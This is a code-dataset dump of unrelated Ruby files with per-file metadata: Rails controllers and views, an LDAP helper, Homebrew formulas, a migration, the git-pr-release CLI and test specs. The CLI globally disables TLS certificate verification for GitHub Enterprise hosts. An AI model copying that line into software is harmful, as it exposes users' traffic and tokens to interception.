1dfb6f875cbdb7d642727473bf7903b27db6adb9 | 114 | json.extract! chat, :id, :student_id, :mentor_id, :created_at, :updated_at
json.url chat_url(chat, format: :json)
| 38 | 74 | 0.745614 |
331b5018bae5f80f5aca0c3494ba6141645230cb | 1,580 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "googleauth"
module Google
module Cloud
module AutoML
module V1beta1
module AutoML
# Credentials for the AutoMl API.
class Credentials < ::Google::Auth::Credentials
self.scope = [
"https://www.googleapis.com/auth/cloud-platform"
]
self.env_vars = [
"AUTOML_CREDENTIALS",
"AUTOML_KEYFILE",
"GOOGLE_CLOUD_CREDENTIALS",
"GOOGLE_CLOUD_KEYFILE",
"GCLOUD_KEYFILE",
"AUTOML_CREDENTIALS_JSON",
"AUTOML_KEYFILE_JSON",
"GOOGLE_CLOUD_CREDENTIALS_JSON",
"GOOGLE_CLOUD_KEYFILE_JSON",
"GCLOUD_KEYFILE_JSON"
]
self.paths = [
"~/.config/google_cloud/application_default_credentials.json"
]
end
end
end
end
end
end
| 30.384615 | 75 | 0.626582 |
acf81699756e8ab772f15ae1a0b8365d4ae34717 | 484 | AvatarsForRails.setup do |config|
# Filters to run before updating the avatar
# config.controller_filters = [ :authenticate_user! ]
# The method to get the avatarable in the controller
# config.controller_avatarable = :current_user
# The default styles that will be generated
# config.avatarable_styles = { small: '50x50',
# medium: '120x120' }
# The tmp path inside public/
# config.public_tmp_path = File.join('system', 'tmp')
end
| 32.266667 | 55 | 0.679752 |
39a0555eea02db61e532fda62fc2293701903bd8 | 2,200 | module EpiCas
class LdapInfo < Struct.new(:username, :user_class)
def attributes
@attributes ||= get_ldap_info
end
def uid
attributes[:uid]
end
def mail
attributes[:mail]
end
def dn
attributes[:dn]
end
def ou
attributes[:ou]
end
def found?
!attributes.empty?
end
private
def get_ldap_info(setting_class = Settings)
begin
return get_ldap_info_from_database if setting_class.read_only
lookup = ldap_finder.lookup
return {} if lookup.blank?
base_info = {
uid: lookup['uid'][0].to_s,
givenname: lookup['givenname'][0].to_s,
sn: lookup['sn'][0].to_s,
mail: lookup['mail'][0].to_s.downcase,
dn: lookup['dn'][0].to_s,
ou: lookup['ou'][0].to_s,
}
if lookup['ou'].size > 1
base_info[:all_ous] = lookup['ou'].map(&:to_s)
end
base_info[:initials] = lookup['initials'][0].to_s.upcase if lookup['initials'].any?
base_info[:person_code] = lookup['shefpersoncode'][0].to_s if lookup['shefpersoncode'].any?
base_info[:reg_number] = lookup['shefregnumber'][0].to_s if lookup['shefregnumber'].any?
base_info[:ucard_number] = lookup['sheflibrarynumber'][0].to_s if lookup['sheflibrarynumber'].any?
base_info
rescue
# If LDAP server is down, fallback to existing records.
get_ldap_info_from_database
end
end
def get_ldap_info_from_database(model = user_class)
existing_user = model.find_by_username(username)
return {} unless existing_user
{
uid: existing_user.uid,
givenname: existing_user.givenname,
sn: existing_user.sn,
mail: existing_user.mail,
dn: existing_user.dn,
ou: existing_user.ou
}
end
def ldap_finder(ldap_finder_class = SheffieldLdapLookup::LdapFinder)
@ldap_finder ||= ldap_finder_class.new(username)
end
end
end | 28.947368 | 108 | 0.562727 |
3963b9d35f3e68ab108180074f292f5d00320177 | 1,284 | class MoviesController < ApplicationController
respond_to :html
# this is really heavy. Should probably move to a javascript form
before_action :load_actors, only: [:new, :create, :edit, :update]
def index
@filter = Filter.new({ title: :title, actor: 'actors.name' }, params)
respond_with @movies = @filter.apply(Movie)
end
def show
respond_with @movie = Movie.find(params[:id])
end
def new
respond_with @movie = Movie.new
end
def create
@movie = Movie.new(movie_params)
if @movie.save
flash[:notice] = 'Movie created successfully.'
end
respond_with @movie
end
def edit
respond_with @movie = Movie.find(params[:id])
end
def update
@movie = Movie.find(params[:id])
if @movie.update_attributes(movie_params)
flash[:notice] = 'Movie updated successfully.'
end
respond_with @movie, location: movies_url
end
def destroy
@movie = Movie.find(params[:id])
respond_with @movie, location: root_url if @movie.nil?
@movie.destroy
flash[:notice] = 'Movie successfully deleted.'
respond_with @movie
end
private
def movie_params
params.require(:movie).permit(:title, :thumbnail_url, actor_ids: [])
end
def load_actors
@actors = Actor.all
end
end
| 20.380952 | 73 | 0.674455 |
e21a79fe69e037fd443f1b4d844d5bd41c44aa9b | 5,873 | require 'octokit'
require 'optparse'
module Git
module Pr
module Release
class CLI
include Git::Pr::Release::Util
extend Git::Pr::Release::Util
def self.start
host, repository, scheme = host_and_repository_and_scheme
if host
# GitHub:Enterprise
OpenSSL::SSL.const_set :VERIFY_PEER, OpenSSL::SSL::VERIFY_NONE # XXX
Octokit.configure do |c|
c.api_endpoint = "#{scheme}://#{host}/api/v3"
c.web_endpoint = "#{scheme}://#{host}/"
end
end
OptionParser.new do |opts|
opts.on('-n', '--dry-run', 'Do not create/update a PR. Just prints out') do |v|
@dry_run = v
end
opts.on('--json', 'Show data of target PRs in JSON format') do |v|
@json = v
end
opts.on('--no-fetch', 'Do not fetch from remote repo before determining target PRs (CI friendly)') do |v|
@no_fetch = v
end
end.parse!
### Set up configuration
production_branch = ENV.fetch('GIT_PR_RELEASE_BRANCH_PRODUCTION') { git_config('branch.production') } || 'master'
staging_branch = ENV.fetch('GIT_PR_RELEASE_BRANCH_STAGING') { git_config('branch.staging') } || 'staging'
say "Repository: #{repository}", :debug
say "Production branch: #{production_branch}", :debug
say "Staging branch: #{staging_branch}", :debug
client = Octokit::Client.new :access_token => obtain_token!
git :remote, 'update', 'origin' unless @no_fetch
### Fetch merged PRs
merged_feature_head_sha1s = git(
:log, '--merges', '--pretty=format:%P', "origin/#{production_branch}..origin/#{staging_branch}"
).map do |line|
main_sha1, feature_sha1 = line.chomp.split /\s+/
feature_sha1
end
merged_pull_request_numbers = git('ls-remote', 'origin', 'refs/pull/*/head').map do |line|
sha1, ref = line.chomp.split /\s+/
if merged_feature_head_sha1s.include? sha1
if %r<^refs/pull/(\d+)/head$>.match ref
pr_number = $1.to_i
if git('merge-base', sha1, "origin/#{production_branch}").first.chomp == sha1
say "##{pr_number} (#{sha1}) is already merged into #{production_branch}", :debug
else
pr_number
end
else
say "Bad pull request head ref format: #{ref}", :warn
nil
end
end
end.compact
if merged_pull_request_numbers.empty?
say 'No pull requests to be released', :error
exit 1
end
merged_prs = merged_pull_request_numbers.map do |nr|
pr = client.pull_request repository, nr
say "To be released: ##{pr.number} #{pr.title}", :notice
pr
end
### Create a release PR
say 'Searching for existing release pull requests...', :info
found_release_pr = client.pull_requests(repository).find do |pr|
pr.head.ref == staging_branch && pr.base.ref == production_branch
end
create_mode = found_release_pr.nil?
# Fetch changed files of a release PR
changed_files = pull_request_files(client, found_release_pr)
if @dry_run
pr_title, new_body = build_pr_title_and_body found_release_pr, merged_prs, changed_files
pr_body = create_mode ? new_body : merge_pr_body(found_release_pr.body, new_body)
say 'Dry-run. Not updating PR', :info
say pr_title, :notice
say pr_body, :notice
dump_result_as_json( found_release_pr, merged_prs, changed_files ) if @json
exit 0
end
pr_title, pr_body = nil, nil
release_pr = nil
if create_mode
created_pr = client.create_pull_request(
repository, production_branch, staging_branch, 'Preparing release pull request...', ''
)
unless created_pr
say 'Failed to create a new pull request', :error
exit 2
end
changed_files = pull_request_files(client, created_pr) # Refetch changed files from created_pr
pr_title, pr_body = build_pr_title_and_body created_pr, merged_prs, changed_files
release_pr = created_pr
else
pr_title, new_body = build_pr_title_and_body found_release_pr, merged_prs, changed_files
pr_body = merge_pr_body(found_release_pr.body, new_body)
release_pr = found_release_pr
end
say 'Pull request body:', :debug
say pr_body, :debug
updated_pull_request = client.update_pull_request(
repository, release_pr.number, :title => pr_title, :body => pr_body
)
unless updated_pull_request
say 'Failed to update a pull request', :error
exit 3
end
labels = ENV.fetch('GIT_PR_RELEASE_LABELS') { git_config('labels') }
if not labels.nil? and not labels.empty?
labels = labels.split(/\s*,\s*/)
labeled_pull_request = client.add_labels_to_an_issue(
repository, release_pr.number, labels
)
unless labeled_pull_request
say 'Failed to add labels to a pull request', :error
exit 4
end
end
say "#{create_mode ? 'Created' : 'Updated'} pull request: #{updated_pull_request.rels[:html].href}", :notice
dump_result_as_json( release_pr, merged_prs, changed_files ) if @json
end
end
end
end
end
| 36.478261 | 124 | 0.570747 |
79e4885ebf0dc04a439abb9898963cdc02225260 | 2,870 | require 'formula'
class Graphviz < Formula
homepage 'http://graphviz.org/'
url 'http://www.graphviz.org/pub/graphviz/stable/SOURCES/graphviz-2.30.1.tar.gz'
sha1 '96739220c4bbcf1bd3bd52e7111f4e60497185c6'
devel do
url 'http://graphviz.org/pub/graphviz/development/SOURCES/graphviz-2.31.20130608.0446.tar.gz'
sha1 '390635729e799fbcc1d8025450b2bf4ad9627b13'
end
# To find Ruby and Co.
env :std
option :universal
option 'with-bindings', 'Build Perl/Python/Ruby/etc. bindings'
option 'with-pangocairo', 'Build with Pango/Cairo for alternate PDF output'
option 'with-freetype', 'Build with FreeType support'
option 'with-x', 'Build with X11 support'
option 'with-app', 'Build GraphViz.app (requires full XCode install)'
option 'with-gts', 'Build with GNU GTS support (required by prism)'
depends_on :libpng
depends_on 'pkg-config' => :build
depends_on 'pango' if build.include? 'with-pangocairo'
depends_on 'swig' if build.include? 'with-bindings'
depends_on :python if build.include? 'with-bindings' # this will set up python
depends_on 'gts' => :optional
depends_on :freetype if build.include? 'with-freetype' or MacOS::X11.installed?
depends_on :x11 if build.include? 'with-x' or MacOS::X11.installed?
depends_on :xcode if build.include? 'with-app'
fails_with :clang do
build 318
end
def patches
{:p0 =>
"https://trac.macports.org/export/103168/trunk/dports/graphics/graphviz/files/patch-project.pbxproj.diff",
}
end
def install
ENV.universal_binary if build.universal?
args = ["--disable-debug",
"--disable-dependency-tracking",
"--prefix=#{prefix}",
"--without-qt",
"--with-quartz"]
args << "--with-gts" if build.with? 'gts'
args << "--disable-swig" unless build.include? 'with-bindings'
args << "--without-pangocairo" unless build.include? 'with-pangocairo'
args << "--without-freetype2" unless build.include? 'with-freetype' or MacOS::X11.installed?
args << "--without-x" unless build.include? 'with-x' or MacOS::X11.installed?
system "./configure", *args
system "make install"
if build.include? 'with-app'
# build Graphviz.app
cd "macosx" do
system "xcodebuild", "-configuration", "Release", "SYMROOT=build", "PREFIX=#{prefix}", "ONLY_ACTIVE_ARCH=YES"
end
prefix.install "macosx/build/Release/Graphviz.app"
end
(bin+'gvmap.sh').unlink
end
test do
(testpath/'sample.dot').write <<-EOS.undent
digraph G {
a -> b
}
EOS
system "#{bin}/dot", "-Tpdf", "-o", "sample.pdf", "sample.dot"
end
def caveats
if build.include? 'with-app'
<<-EOS
Graphviz.app was installed in:
#{prefix}
To symlink into ~/Applications, you can do:
brew linkapps
EOS
end
end
end
| 30.531915 | 117 | 0.661324 |
3913851f15b6a60e493679cf8a6c5851495db6de | 334 | require "simplecov"
SimpleCov.start "rails"
ENV["RAILS_ENV"] ||= "test"
require_relative "../config/environment"
require "rails/test_help"
class ActiveSupport::TestCase
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 25.692308 | 82 | 0.748503 |
1dc1245a70aed970292bd7584834116e553ba876 | 713 | class Notification < ApplicationRecord
self.inheritance_column = nil
serialize :params, Noticed::Coder
belongs_to :recipient, polymorphic: true
scope :sorted, -> { order(created_at: :desc) }
def self.mark_as_read!
update_all(read_at: Time.current, updated_at: Time.current)
end
# Rehydrate the database notification into the Notification object for rendering
def to_instance
@instance ||= begin
instance = type.constantize.new(params)
instance.record = self
instance
end
end
def mark_as_read!
update(read_at: Time.current)
end
def unread?
!read?
end
def read?
read_at?
end
end
| 20.371429 | 82 | 0.643759 |
33e4f364dcdf5d18efeb76844f68fd2ef81b01d4 | 3,984 | module MyAcademics
class CollegeAndLevel
include AcademicsModule, ClassLogger
def merge(data)
response = Bearfacts::Profile.new(user_id: @uid).get
feed = response.delete :feed
# The Bear Facts API can return empty profiles if the user is no longer (or not yet) considered an active student.
# Partial profiles can be returned for incoming students around the start of the term.
if (feed.nil? || feed['studentProfile']['studentGeneralProfile'].blank? || feed['studentProfile']['ugGradFlag'].blank?)
response[:empty] = true
else
response.merge! parse_feed(feed)
end
response[:termName] = parse_term_name feed
data[:collegeAndLevel] = response
end
def parse_feed(feed)
ug_grad_flag = feed['studentProfile']['ugGradFlag'].to_text
standing = case ug_grad_flag.upcase
when 'U' then 'Undergraduate'
when 'G' then 'Graduate'
else
logger.error("Unknown ugGradFlag '#{ug_grad_flag}' for user #{@uid}")
return {}
end
general_profile = feed['studentProfile']['studentGeneralProfile']
level = general_profile['corpEducLevel'].to_text.titleize
nonAPLevel = general_profile['nonAPLevel'].to_text.titleize
futureTBLevel = general_profile['futureTBLevel'].to_text.titleize
colleges = []
primary_college_abbv = general_profile['collegePrimary'].to_text
primary_college = Berkeley::Colleges.get(primary_college_abbv)
primary_major = Berkeley::Majors.get(general_profile['majorPrimary'].to_text)
# this code block is not very DRY, but that makes it easier to understand the wacky requirements. See CLC-2017 for background.
if primary_college_abbv.in?(['GRAD DIV', 'LAW', 'CONCURNT'])
if primary_major == 'Double' || primary_major == 'Triple'
colleges << {
:college => (general_profile['collegeSecond'].blank? ? primary_college : Berkeley::Colleges.get(general_profile['collegeSecond'].to_text)),
:major => Berkeley::Majors.get(general_profile['majorSecond'].to_text)
}
colleges << {
:college => Berkeley::Colleges.get(general_profile['collegeThird'].to_text),
:major => Berkeley::Majors.get(general_profile['majorThird'].to_text)
}
if primary_major == 'Triple'
colleges << {
:college => Berkeley::Colleges.get(general_profile['collegeFourth'].to_text),
:major => Berkeley::Majors.get(general_profile['majorFourth'].to_text)
}
end
else
colleges << {
:college => primary_college,
:major => primary_major
}
end
else
if primary_major == 'Double' || primary_major == 'Triple'
colleges << {
:college => primary_college,
:major => Berkeley::Majors.get(general_profile['majorSecond'].to_text)
}
colleges << {
:college => '',
:major => Berkeley::Majors.get(general_profile['majorThird'].to_text)
}
if primary_major == 'Triple'
colleges << {
:college => '',
:major => Berkeley::Majors.get(general_profile['majorFourth'].to_text)
}
end
else
colleges << {
:college => primary_college,
:major => primary_major
}
end
end
{
standing: standing,
level: level,
nonApLevel: nonAPLevel,
futureTelebearsLevel: futureTBLevel,
colleges: colleges
}
end
def parse_term_name(feed)
if (feed.nil? || feed['studentProfile']['termName'].blank? || feed['studentProfile']['termYear'].blank?)
Berkeley::Terms.fetch.current.to_english
else
"#{feed['studentProfile']['termName'].to_text} #{feed['studentProfile']['termYear'].to_text}"
end
end
end
end
| 37.233645 | 151 | 0.609438 |
b93fbafdd2539e83afe861ab0fa11e0c5c1dd77c | 180 | #!/usr/bin/env ruby
$LOAD_PATH.unshift(File.join(File.expand_path('..', __dir__), 'app/lib'))
ENV['RAKE'] = nil
require 'tomato_shrieker'
TomatoShrieker::Scheduler.instance.exec
| 22.5 | 73 | 0.733333 |
627851dba25cae2682bce84e60c018a1a71fd8a5 | 1,104 | require 'test_helper'
class NotificationsControllerTest < ActionController::TestCase
def test_should_get_index
get :index
assert_response :success
assert_not_nil assigns(:notifications)
end
def test_should_get_new
get :new
assert_response :success
end
def test_should_create_notification
assert_difference('Notification.count') do
post :create, :notification => { }
end
assert_redirected_to notification_path(assigns(:notification))
end
def test_should_show_notification
get :show, :id => notifications(:one).id
assert_response :success
end
def test_should_get_edit
get :edit, :id => notifications(:one).id
assert_response :success
end
def test_should_update_notification
put :update, :id => notifications(:one).id, :notification => { }
assert_redirected_to notification_path(assigns(:notification))
end
def test_should_destroy_notification
assert_difference('Notification.count', -1) do
delete :destroy, :id => notifications(:one).id
end
assert_redirected_to notifications_path
end
end
| 24 | 68 | 0.740036 |
7abd1492681ac5137055c31b56c1000443a39d1b | 312 | cask "shift" do
version "5.0.86"
sha256 "f3ceca819a0bc29f4acb334e80bc9a9f564204dccfd7cdcf5c20d97c4e427d41"
url "https://update.tryshift.com/download/version/#{version}/osx_64"
appcast "https://tryshift.com/download/?platform=mac"
name "Shift"
homepage "https://tryshift.com/"
app "Shift.app"
end
| 26 | 75 | 0.75 |
792f8e9dd955755f81172c2bb1a61f486a9f7ce0 | 3,742 | require 'faye/websocket'
require 'eventmachine'
module RSlack
module Slack
module Live
attr_reader :url, :socket_client
# Public: Method that connects to the WebSocket server using the URL
# of the server which is inside the response of the rtm.start call
#
# url - A WebSocket URL
# block - A required block containing the action to be done when a message
# event was triggered by the WebSocket server
#
# Examples
#
# class Dummy
# include RSlack::Slack::LIVE
#
# def some_slack_method
# connect!(url: 'a url') do |message, channel|
# end
# end
# end
#
#
# Raises 'A valid url must be passed' (RuntimeError) if url was not passed
# Raises 'A valid block must me passed' (RuntimeError) if block was not passed
def connect!(url:, &block)
raise 'A valid url must be passed' if url.nil? || url.empty?
raise 'A valid block must me passed' unless block_given?
@url = url
EventMachine.run do
@socket_client = Faye::WebSocket::Client.new(url)
socket_client.on :message do |event|
parsed = JSON.parse event.data
if can_propagate? parsed
user = parsed['user']
text = parsed['text'].split(':').reverse.first
channel = parsed['channel']
block.call(text, channel)
end
end
end
end
private
# Internal: Generic method to perform any call to Slack's API
#
# method - Desired HTTP method (defaults to GET)
# url - Slack's desired API method
# block - An optional block containing the parameters of the request.
#
# Examples
#
# class Dummy
# include RSlack::Slack::API
#
# def some_slack_method(params = {})
# perform_call(method: :put, url: 'a-slack-method') do
# params
# end
# end
# end
#
#
# Returns the response of the HTTP call or raises one of the following
# errors:
#
# ConnectionFailedError => HTTP Errors
# MigrationInProgressError => Error on Slack's RTM API: migration_in_progress
# NotAuthenticatedError => Error on Slack's RTM API: not_authed
# InvalidAuthError => Error on Slack's RTM API: invalid_auth
# AccountInactiveError => Error on Slack's RTM API: account_inactive
# InvalidCharsetError => Error on Slack's RTM API: invalid_charset
def perform_call(method: :get, url:, &block)
config = RSlack::Configuration.current
url = "#{config.api_url}/#{url}?token=#{config.token}"
params = {}
begin
params = block.call() if block_given?
response = RestClient.send(method, url, params)
rescue => e
raise ConnectionFailedError.new(e)
end
response = JSON.parse response.body
check_response response unless response['ok']
response
end
# Internal: Checks if the body of the event triggered by the
# WebSocket server can be passed to the bot.
#
# parsed - Hash representing the parsed body of the event
#
# Returns true if: event is of the type 'message' and
# id of the bot is nil or id of the user who sent the message is different
# of the id of the bot and the message mentions the bot.
def can_propagate?(parsed)
return false if parsed['type'] != 'message'
id.nil? ||
(
id != parsed['user'] &&
parsed['text'].include?(id)
)
end
end
end
end
| 31.982906 | 85 | 0.581507 |
abfd59eaa21750e38f2a2a8f9bb965b0027e31e8 | 1,158 | require_relative 'treasure_trove'
require_relative 'Playable'
module StudioGame
class Player
include Playable
attr_accessor :name
attr_reader :health
def initialize(name, health=100)
@name = name.capitalize
@health = health
@found_treasures = Hash.new(0)
end
def self.from_csv(string)
name, health = string.split(',')
Player.new(name, Integer(health))
end
def each_found_treasure
@found_treasures.each do |name, points|
yield Treasure.new(name, points)
end
end
def found_treasure(treasure)
@found_treasures[treasure.name] += treasure.points
puts "#{@name} found a #{treasure.name} worth #{treasure.points} points."
puts "#{@name}'s treasures: #{@found_treasures}"
end
def points
@found_treasures.values.reduce(0, :+)
end
def to_s
"I'm #{@name} with health = #{@health}, points = #{points}, and score = #{score}."
end
def score
@health + points
end
def <=>(other)
other.score <=> score
end
end
if __FILE__ == $0
player = Player.new("moe")
puts player.name
puts player.health
player.w00t
puts player.health
player.blam
puts player.health
end
end
| 19.3 | 85 | 0.67962 |
1de5243db2d5c8a3a014df1ed2449f0b98b45632 | 919 | # frozen_string_literal: true
# See LICENSE.txt at root of repository
# GENERATED FILE - DO NOT EDIT!!
require 'ansible/ruby/modules/base'
module Ansible
module Ruby
module Modules
# This module allows you to copy the running configuration of a switch over its startup configuration. It is recommended to use this module shortly after any major configuration changes so they persist after a switch restart. This module uses SSH to manage network device configuration. The results of the operation will be placed in a directory named 'results' that must be created by the user in their local directory to where the playbook is run. For more information about this module from Lenovo and customizing it usage for your use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_save.html)
class Cnos_save < Base
end
end
end
end
| 57.4375 | 672 | 0.781284 |
f8f14e9a34d96ac8056ebcee151a949ce65d265a | 1,235 | require_domain_file
describe ManageIQ::Automate::Cloud::VM::Provisioning::Profile::GetDeployDialog do
let(:cat) { 'environment' }
let(:tag) { 'dev' }
let(:root_hash) { { 'dialog_input_vm_tags' => "#{cat}/#{tag}" } }
let(:root_object) { Spec::Support::MiqAeMockObject.new(root_hash) }
let(:ae_service) do
Spec::Support::MiqAeMockService.new(root_object).tap do |service|
current_object = Spec::Support::MiqAeMockObject.new
current_object.parent = root_object
service.object = current_object
end
end
it 'sets dialog name in the root object' do
described_class.new(ae_service).main(true)
expect(ae_service.root['dialog_name']).to(eq("miq_provision_dialogs-deploy-#{tag}"))
end
context 'does not set dialog name' do
it '#not matching dialog_input_vm_tags attribute' do
ae_service.root['dialog_input_vm_tags'] = 'not_matching_string'
described_class.new(ae_service).main(true)
expect(ae_service.root['dialog_name']).to(eq(nil))
end
it '#run_env_dialog flag is false' do
expect(ae_service).not_to(receive(:log))
described_class.new(ae_service).main
expect(ae_service.root['dialog_name']).to(eq(nil))
end
end
end
| 34.305556 | 88 | 0.693927 |
edd786cce7bdc96e1fd7518d177097debd061749 | 1,387 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MutatorRails::Statistics do
let(:object) { described_class.call }
let(:statistics_file) { 'log/mutant/statistics.txt' }
before do
File.delete(statistics_file) if File.exist?(statistics_file)
end
describe '#call' do
let(:expectations) do
"
2 module(s) were mutated in 2 minutes 7 seconds
for a total of 198 mutations tested @ 1.56/sec average
which left 52 mutations alive (26.3%)
and 146 killed (73.7%)
0 module(s) were fully mutated (0.0%)
The following modules remain with failures (check log):
. Export::ActivityExporter
The following modules fell back to non-parallel(-j1):
. Export::ActivityExporter2
The following modules had most alive mutations (top 10):
. Export::ActivityExporter (26)
. Export::ActivityExporter2 (26)
The following modules had longest mutation time (top 10):
. Export::ActivityExporter (1 minute 3 seconds)
. Export::ActivityExporter2 (1 minute 3 seconds)
The following modules had largest mutation count (top 10):
. Export::ActivityExporter (99)
. Export::ActivityExporter2 (99)"
end
it 'processes the log files' do
object
expect(File.exist?(statistics_file)).to be true
end
it 'has the proper stats' do
object
stats = File.read(statistics_file)
expect(stats).to match(expectations)
end
end
end
| 25.218182 | 64 | 0.720981 |
03a6d2f502cca3c4fb8d2d7eee22f574a49b579d | 548 | require "utils/commands/add_path_command"
require "plugins/plugin_command_spec"
describe AddPath do
let(:test_path) { "test path" }
subject { AddPath.new(test_path) }
it_behaves_like "a plugin command"
describe "#do" do
before do
allow(subject).to receive(:system)
end
it "SHOULD add correct path export to bash_profile" do
subject.do
expect(subject).to have_received(:system).with("echo 'export PATH=#{test_path}:$PATH' >> ~/.bash_profile")
end
end
end
| 23.826087 | 118 | 0.638686 |
26bcc8aba719e14e79672a6cfdcafd7810341c2f | 43 | module CelViewTool
VERSION = "0.1.0"
end
| 10.75 | 19 | 0.697674 |
b9c6b5e70a0f6da321d31241e5d11f569278e3d3 | 1,657 | class Pulumi < Formula
desc "Cloud native development platform"
homepage "https://pulumi.io/"
url "https://github.com/pulumi/pulumi.git",
:tag => "v1.14.0",
:revision => "ee675011512b6f847eeb45685f8873db89e09d10"
bottle do
cellar :any_skip_relocation
sha256 "f8a22bc2dd23579a32359926cb63db6dd4ee313683cc6d56234740da76fec465" => :catalina
sha256 "3ecaf0853980d7d53f43997d36da42020f8f28fdeac12c921c7a9cc52ab661db" => :mojave
sha256 "4c93c36683f2fe1daedc37fe41ab93cf19fd42e1c4edb32159a277dc84601073" => :high_sierra
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "on"
dir = buildpath/"src/github.com/pulumi/pulumi"
dir.install buildpath.children
cd dir do
cd "./sdk" do
system "go", "mod", "download"
end
cd "./pkg" do
system "go", "mod", "download"
end
system "make", "dist"
bin.install Dir["#{buildpath}/bin/*"]
prefix.install_metafiles
# Install bash completion
output = Utils.popen_read("#{bin}/pulumi gen-completion bash")
(bash_completion/"pulumi").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/pulumi gen-completion zsh")
(zsh_completion/"_pulumi").write output
end
end
test do
ENV["PULUMI_ACCESS_TOKEN"] = "local://"
ENV["PULUMI_TEMPLATE_PATH"] = testpath/"templates"
system "#{bin}/pulumi", "new", "aws-typescript", "--generate-only",
"--force", "-y"
assert_predicate testpath/"Pulumi.yaml", :exist?, "Project was not created"
end
end
| 31.264151 | 93 | 0.648159 |
1d2137814d8e655078651e239367cdc3d7ed841b | 106 | require "httparty"
class BaseService
include HTTParty
base_uri "https://gorest.co.in/public-api"
end
| 15.142857 | 44 | 0.764151 |
bfb2312f498d14e439c5dd2e57da4aeff427dfbb | 314 | # app.rb
require 'rubygems'
require 'sinatra/base'
require 'rack'
require 'yaml'
require 'erb'
class TestApp < Sinatra::Base
set :root, File.dirname(__FILE__)
set :static, true
get '/:view' do |view|
erb view.to_sym
end
end
if __FILE__ == $0
Rack::Handler::Mongrel.run TestApp, :Port => 8070
end
| 14.952381 | 51 | 0.681529 |
6254017615b8bf65177d72aef6a2540154539f89 | 2,168 | class RemoveDotAtomPathEndingOfProjects < ActiveRecord::Migration[4.2]
include Gitlab::ShellAdapter
class ProjectPath
attr_reader :old_path, :id, :namespace_path
def initialize(old_path, id, namespace_path, namespace_id)
@old_path = old_path
@id = id
@namespace_path = namespace_path
@namespace_id = namespace_id
end
def clean_path
@_clean_path ||= PathCleaner.clean(@old_path, @namespace_id)
end
end
class PathCleaner
def initialize(path, namespace_id)
@namespace_id = namespace_id
@path = path
end
def self.clean(*args)
new(*args).clean
end
def clean
path = cleaned_path
count = 0
while path_exists?(path)
path = "#{cleaned_path}#{count}"
count += 1
end
path
end
private
def cleaned_path
@_cleaned_path ||= @path.gsub(/\.atom\z/, '-atom')
end
def path_exists?(path)
Project.find_by_path_and_namespace_id(path, @namespace_id)
end
end
def projects_with_dot_atom
select_all("SELECT p.id, p.path, n.path as namespace_path, n.id as namespace_id FROM projects p inner join namespaces n on n.id = p.namespace_id WHERE p.path LIKE '%.atom'")
end
def up
projects_with_dot_atom.each do |project|
project_path = ProjectPath.new(project['path'], project['id'], project['namespace_path'], project['namespace_id'])
clean_path(project_path) if rename_project_repo(project_path)
end
end
private
def clean_path(project_path)
execute "UPDATE projects SET path = #{sanitize(project_path.clean_path)} WHERE id = #{project_path.id}"
end
def rename_project_repo(project_path)
old_path_with_namespace = File.join(project_path.namespace_path, project_path.old_path)
new_path_with_namespace = File.join(project_path.namespace_path, project_path.clean_path)
gitlab_shell.mv_repository("#{old_path_with_namespace}.wiki", "#{new_path_with_namespace}.wiki")
gitlab_shell.mv_repository(old_path_with_namespace, new_path_with_namespace)
rescue
false
end
def sanitize(value)
ActiveRecord::Base.connection.quote(value)
end
end
| 26.765432 | 177 | 0.704797 |
ff068e9b287f58cadf6674cdea585adeed505e28 | 926 | require 'spec_helper'
describe 'postfix::augeas' do
let (:facts) { {
:augeasversion => '1.2.0',
:lsbdistcodename => 'wheezy',
:operatingsystem => 'Debian',
:osfamily => 'Debian',
:rubyversion => '1.9.3',
:path => '/foo/bar',
} }
let :pre_condition do
"include ::augeas"
end
it { is_expected.to contain_augeas__lens('postfix_transport').with(
:ensure => 'present',
:lens_source => 'puppet:///modules/postfix/lenses/postfix_transport.aug',
:test_source => 'puppet:///modules/postfix/lenses/test_postfix_transport.aug',
:stock_since => '1.0.0'
) }
it { is_expected.to contain_augeas__lens('postfix_virtual').with(
:ensure => 'present',
:lens_source => 'puppet:///modules/postfix/lenses/postfix_virtual.aug',
:test_source => 'puppet:///modules/postfix/lenses/test_postfix_virtual.aug',
:stock_since => '1.0.0'
) }
end
| 31.931034 | 82 | 0.62635 |
d5a8b690b9e56b6b0f7c8c83e10206bc4fb3c51a | 201 | module ImagesHelper
# called in goals show page to display latest image
def view_latest_image
if @goal.images.any?
image_tag(@goal.images.last.url)
end
end
end | 20.1 | 55 | 0.641791 |
080ea0f21bc386be0c5d5f41178fd374bf017109 | 5,295 | #
# Author:: John Keiser (<[email protected]>)
# Copyright:: Copyright (c) 2013 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'support/shared/integration/integration_helper'
require 'support/shared/context/config'
require 'chef/knife/raw'
require 'chef/knife/show'
describe 'knife raw' do
include IntegrationSupport
include KnifeSupport
include AppServerSupport
include_context "default config options"
when_the_chef_server "has one of each thing" do
before do
client 'x', '{}'
cookbook 'x', '1.0.0'
data_bag 'x', { 'y' => '{}' }
environment 'x', '{}'
node 'x', '{}'
role 'x', '{}'
user 'x', '{}'
end
it 'knife raw /nodes/x returns the node', :pending => (RUBY_VERSION < "1.9") do
knife('raw /nodes/x').should_succeed <<EOM
{
"name": "x",
"json_class": "Chef::Node",
"chef_type": "node",
"chef_environment": "_default",
"override": {
},
